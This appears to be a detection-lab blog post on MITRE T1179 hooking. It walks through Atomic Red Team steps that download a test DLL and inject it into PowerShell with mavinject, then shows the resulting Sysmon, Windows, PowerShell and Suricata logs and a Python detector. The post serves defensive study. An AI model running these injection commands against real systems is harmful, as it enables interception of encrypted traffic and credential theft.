Detecting Hooking in a Windows Environment

In this post we will be simulating and detecting Hooking (technique ID T1179) from the MITRE ATT&CK framework. Per MITRE, this technique can be used for persistence, privilege escalation or credential access. We will be using one of Atomic Red Team’s available tests on Detection Lab.

Firstly, what is hooking?
"Code hooking is a very intrusive coding operation where mainly OS function calls are intercepted by a program to alter or augment their behavior." - Securityintelligence.com

In simple terms, hooking is a technique where the attacker uses a malicious file to intercept the legitimate calls that the user's programs make to legitimate OS functions. MITRE has a very well documented page on Hooking. Analyzing and detecting hooking is difficult without an endpoint solution in place, as this technique involves system-level calls.

In our lab, we will be ‘hooking’ a simple GET request to a website and reading what the website returns. First, the image below shows what a normal user who is not infected sees when they make a GET request to https://example.com

Observe how we do not see the payload. This is the expected behavior, as we are visiting the website over HTTPS: due to TLS encryption, the payload is encrypted.

Let’s begin our attack. First, we download the file to our machine. This file is a .dll crafted by Red Canary which, once injected, intercepts the TLS encryption calls and enables the attacker to read the payload.

Step 1: Download the file. I have used my own directory, but feel free to change it.

```powershell
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "C:\Tools\Hooking\T1179x64.dll"
```

Step 2: Execute the file using mavinject.

```powershell
PS C:\Users\vagrant> mavinject $pid /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll
PS C:\Users\vagrant> Ready To Roll Out!
```

Step 3: Make a request to the website (in Windows PowerShell, curl is an alias for Invoke-WebRequest).

```powershell
curl https://example.com
```

Done. Now observe the image below and compare it with the first image we saw: this time we see the payload as well.

This is a very simple demonstration. In a real-life scenario, the adversary will probably intercept using stealthier techniques. However, the underlying calls made remain the same. Now, let us see what got logged in Sysmon, Windows Security Events, Suricata and Zeek.

*Note: These Sysmon rules are pre-written by SwiftOnSecurity. We might need to write these rules ourselves or implement their Sysmon configuration.*
*We are using mavinject.exe, and hence this rule triggered. An adversary can use a different technique to hook, and then this rule might not trigger. Basically, this rule is not tied to hooking by itself.*

Rule 1: Mavinject:

```
04/07/2020 02:22:20 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Process Create (rule: ProcessCreate) OpCode=Info RecordNumber=97717 Keywords=None Message=Process Create: RuleName: Mavinject UtcTime: 2020-04-07 02:22:20.284 ProcessGuid: {f26a5612-e3dc-5e8b-0000-0010d4429000} ProcessId: 5128 Image: C:\Windows\System32\mavinject.exe FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Description: Microsoft Application Virtualization Injector Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: mavinject64.exe CommandLine: "C:\Windows\system32\mavinject.exe" 2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll CurrentDirectory: C:\Users\vagrant\ User: WIN10\vagrant LogonGuid: {f26a5612-cae7-5e8b-0000-0020ac8c0200} LogonId: 0x28CAC TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=1847CE5831ACAECF84DD3E28A0EE6BF6FB98E343,MD5=80EAEBA49FFD53712F4304A442C95F0D,SHA256=926B54D54DEC971022BD18F97AB970D4533B34A1CEF9C65DCA1B696C1119CD90,IMPHASH=425D26BBB68ABA4D2076E192A519914A ParentProcessGuid: {f26a5612-ce7a-5e8b-0000-0010de0f2700} ParentProcessId: 2968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
```

For the Windows event logs (Security and PowerShell) we see:

1- Event 4103. This event gets logged when PowerShell module logging is enabled.

```
04/07/2020 12:50:44 AM LogName=Microsoft-Windows-PowerShell/Operational SourceName=Microsoft-Windows-PowerShell EventCode=4103 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-21-2442856559-1527439232-1060400613-1000 SidType=0 TaskCategory=Executing Pipeline OpCode=To be used when operation is just executing a method RecordNumber=46426 Keywords=None Message=CommandInvocation(Test-Path): "Test-Path" ParameterBinding(Test-Path): name="Path"; value="C:\Tools\Hooking\T1179x64.dll" Context: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.18362.1 Host ID = 1a15f5ac-dd89-4529-a29f-b6a0e3d0d37a Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Engine Version = 5.1.18362.1 Runspace ID = 70c41cad-3d9a-4e5d-905c-3fed4b13e63a Pipeline ID = 8 Command Name = Test-Path Command Type = Cmdlet Script Name = Command Path = Sequence Number = 26 User = WIN10\vagrant Connected User = Shell ID = Microsoft.PowerShell
```

2- Event 4688: A new process has been created.

```
04/07/2020 02:23:16 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=win10.windomain.local TaskCategory=Process Creation OpCode=Info RecordNumber=448997 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-2442856559-1527439232-1060400613-1000 Account Name: vagrant Account Domain: WIN10 Logon ID: 0x28CAC Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1798 New Process Name: C:\Windows\System32\mavinject.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb98 Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\Windows\system32\mavinject.exe" 2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
```
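Both the Sysmon Event 1 (Rule 1 above) and the Security Event 4688 carry the injecting command line in their flattened "Key: value" message text. The following is an added example, not code from the post, Atomic Red Team or SwiftOnSecurity, that parses that text and flags mavinject.exe used with /INJECTRUNNING, reporting the target PID, the DLL and the parent process; the sample events are constructed from the values shown on this page, and the list of field names is an assumption about which keys appear in these two event types.

```python
# Added example (not from the post): flag mavinject.exe DLL injection in the flattened
# "Key: value" message text of Sysmon Event ID 1 and Security Event ID 4688 shown above.
import re

# Fields we read, plus the fields that follow them so each value knows where to stop.
FIELDS = ["Image", "CommandLine", "ParentImage", "ParentCommandLine", "FileVersion",
          "CurrentDirectory", "ParentProcessId", "New Process Name", "Process Command Line",
          "Creator Process Name", "Creator Process ID", "Token Elevation Type"]
_ALTS = "|".join(map(re.escape, FIELDS))
# A value runs until the next known key, the 4688 help text, or end of line.
_FIELD_RE = re.compile(rf"(?P<key>{_ALTS}): (?P<val>.*?)"
                       rf"(?=\s(?:{_ALTS}): |\sToken Elevation Type indicates|$)")
_INJECT_RE = re.compile(r"\s(\d+)\s+/INJECTRUNNING\s+(\S+)", re.IGNORECASE)

def parse_fields(event: str) -> dict:
    return {m["key"]: m["val"].strip().strip('"') for m in _FIELD_RE.finditer(event)}

def detect_mavinject_injection(event: str):
    """Return {target_pid, dll, parent} when mavinject.exe /INJECTRUNNING is seen, else None."""
    f = parse_fields(event)          # Sysmon 1 and 4688 name the same facts differently
    image = f.get("Image") or f.get("New Process Name", "")
    cmdline = f.get("CommandLine") or f.get("Process Command Line", "")
    parent = f.get("ParentImage") or f.get("Creator Process Name", "")
    m = _INJECT_RE.search(cmdline)
    if not image.lower().endswith("\\mavinject.exe") or not m:
        return None
    return {"target_pid": int(m.group(1)), "dll": m.group(2), "parent": parent}

# Constructed samples, trimmed from the events on this page (hashes and GUIDs dropped).
SYSMON_1 = (
    'Message=Process Create: RuleName: Mavinject ProcessId: 5128 Image: C:\\Windows\\System32\\mavinject.exe '
    'FileVersion: 10.0.18362.1 Description: Microsoft Application Virtualization Injector '
    'CommandLine: "C:\\Windows\\system32\\mavinject.exe" 2968 /INJECTRUNNING C:\\Tools\\Hooking\\T1179x64.dll '
    'CurrentDirectory: C:\\Users\\vagrant\\ User: WIN10\\vagrant ParentProcessId: 2968 '
    'ParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'ParentCommandLine: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"')
SECURITY_4688 = (
    'Message=A new process has been created. Process Information: New Process ID: 0x1798 '
    'New Process Name: C:\\Windows\\System32\\mavinject.exe Token Elevation Type: %%1936 '
    'Creator Process ID: 0xb98 Creator Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'Process Command Line: "C:\\Windows\\system32\\mavinject.exe" 2968 /INJECTRUNNING C:\\Tools\\Hooking\\T1179x64.dll '
    'Token Elevation Type indicates the type of token that was assigned to the new process.')
BENIGN = ('Message=Process Create: Image: C:\\Windows\\System32\\notepad.exe FileVersion: 10.0 '
          'CommandLine: notepad.exe CurrentDirectory: C:\\ ParentImage: C:\\Windows\\explorer.exe '
          'ParentCommandLine: explorer.exe')

if __name__ == "__main__":
    for name, ev in [("sysmon1", SYSMON_1), ("4688", SECURITY_4688), ("benign", BENIGN)]:
        print(name, detect_mavinject_injection(ev))
```

Both real events resolve to the same finding (target PID 2968, the T1179x64.dll path, powershell.exe as parent), while the benign notepad event is ignored.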

3- Event 800: Pipeline Execution Details

```
04/07/2020 12:46:38 AM LogName=Windows PowerShell SourceName=PowerShell EventCode=800 EventType=4 Type=Information ComputerName=win10.windomain.local TaskCategory=Pipeline Execution Details OpCode=Info RecordNumber=43826 Keywords=Classic Message=Pipeline execution details for command line: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "C:\Tools\Hooking\T1179x64.dll". Context Information: DetailSequence=1 DetailTotal=1 SequenceNumber=128 UserId=WIN10\vagrant HostName=ConsoleHost HostVersion=5.1.18362.1 HostId=e539a787-786a-434a-bc04-540e65e5dbeb HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe EngineVersion=5.1.18362.1 RunspaceId=837ff37b-1fdc-470d-b3a8-f8591ee0f2a3 PipelineId=23 ScriptName= CommandLine=Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "C:\Tools\Hooking\T1179x64.dll" Details: CommandInvocation(Invoke-WebRequest): "Invoke-WebRequest" ParameterBinding(Invoke-WebRequest): name="OutFile"; value="C:\Tools\Hooking\T1179x64.dll" ParameterBinding(Invoke-WebRequest): name="Uri"; value=https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll
```

4- Suricata Signature: ET POLICY PowerShell Command With Encoded Argument Over SMB - Likely Lateral Movement. Note that the matched payload is a PowerShell transcript crossing the network over SMB (port 445) and containing our mavinject command line, so this signature fired on the transcript text rather than on the hooking itself.

```
{"timestamp":"2020-04-07T00:56:46.925599+0000","flow_id":563498900682229,"in_iface":"eth1","event_type":"alert","src_ip":"192.168.38.104","src_port":50748,"dest_ip":"192.168.38.103","dest_port":445,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2027172,"rev":1,"signature":"ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement","category":"Potentially Bad Traffic","severity":2,"metadata":{"updated_at":["2019_04_10"],"created_at":["2019_04_10"],"signature_severity":["Minor"],"deployment":["Internal"],"attack_target":["Client_Endpoint"],"affected_product":["Windows_XP_Vista_7_8_10_Server_32_64_Bit"],"former_category":["POLICY"]}},"app_proto":"smb","flow":{"pkts_toserver":25,"pkts_toclient":16,"bytes_toserver":15073,"bytes_toclient":3369,"start":"2020-04-07T00:56:46.620021+0000"},"payload r\nWindows PowerShell transcript start\r\nStart time: 20200407005107\r\nUsername: WIN10\\vagrant\r\nRunAs User: WIN10\\vagrant\r\nConfiguration Name: \r\nMachine: WIN10 (Microsoft Windows NT 10.0.18362.0)\r\nHost Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nProcess ID: 2968\r\nPSVersion: 5.1.18362.1\r\nPSEdition: Desktop\r\nPSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.18362.1\r\nBuildVersion: 10.0.18362.1\r\nCLRVersion: 4.0.30319.42000\r\nWSManStackVersion: 3.0\r\nPSRemotingProtocolVersion: 2.3\r\nSerializationVersion: 1.1.0.1\r\n**********************\r\n**********************\r\nCommand start time: 20200407005212\r\n**********************\r\nPS C:\\Users\\vagrant> mavinject $pid \/INJECTRUNNING C\\Tools\\Hooking\\T1179x64.dll\r\n**********************\r\nCommand start time: 20200407005234\r\n**********************\r\nPS
```

I forgot to add this in the beginning, but:

Sysmon Event Code 1: Process Create

```
04/07/2020 02:23:16 AM LogName=Microsoft-Windows-Sysmon/Operational SourceName=Microsoft-Windows-Sysmon EventCode=1 EventType=4 Type=Information ComputerName=win10.windomain.local User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 TaskCategory=Process Create (rule: ProcessCreate) OpCode=Info RecordNumber=97760 Keywords=None Message=Process Create: RuleName: Mavinject UtcTime: 2020-04-07 02:23:16.001 ProcessGuid: {f26a5612-e414-5e8b-0000-00109cf29000} ProcessId: 6040 Image: C:\Windows\System32\mavinject.exe FileVersion: 10.0.18362.1 (WinBuild.160101.0800) Description: Microsoft Application Virtualization Injector Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: mavinject64.exe CommandLine: "C:\Windows\system32\mavinject.exe" 2968 /INJECTRUNNING C:\Tools\Hooking\T1179x64.dll CurrentDirectory: C:\Users\vagrant\ User: WIN10\vagrant LogonGuid: {f26a5612-cae7-5e8b-0000-0020ac8c0200} LogonId: 0x28CAC TerminalSessionId: 1 IntegrityLevel: High Hashes: SHA1=1847CE5831ACAECF84DD3E28A0EE6BF6FB98E343,MD5=80EAEBA49FFD53712F4304A442C95F0D,SHA256=926B54D54DEC971022BD18F97AB970D4533B34A1CEF9C65DCA1B696C1119CD90,IMPHASH=425D26BBB68ABA4D2076E192A519914A ParentProcessGuid: {f26a5612-ce7a-5e8b-0000-0010de0f2700} ParentProcessId: 2968 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
```

Conclusion:
Logging and locating .dll files is a cumbersome task, as .dlls are accessed almost every second. I could not locate the execution of the .dll as a log itself. However, we were able to locate the steps taken to execute this attack. While researching how to detect hooking, Procmon was one of the possible solutions. The Process Monitor tool can be used to help identify DLL load operations that might be vulnerable. The Process Monitor tool can be downloaded from https://technet.microsoft.com/sysinternals/bb896645.aspx. [Citation Microsoft]

Mention in the comments below if you know how to accurately detect dll calls made by the hooking technique.


Credits (resources used while making this lab):
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1179/T1179.md
https://attack.mitre.org/techniques/T1179
https://www.myeventlog.com/search/show/977
https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e
https://betanews.com/2015/11/18/how-to-monitor-registry-changes/
https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-security
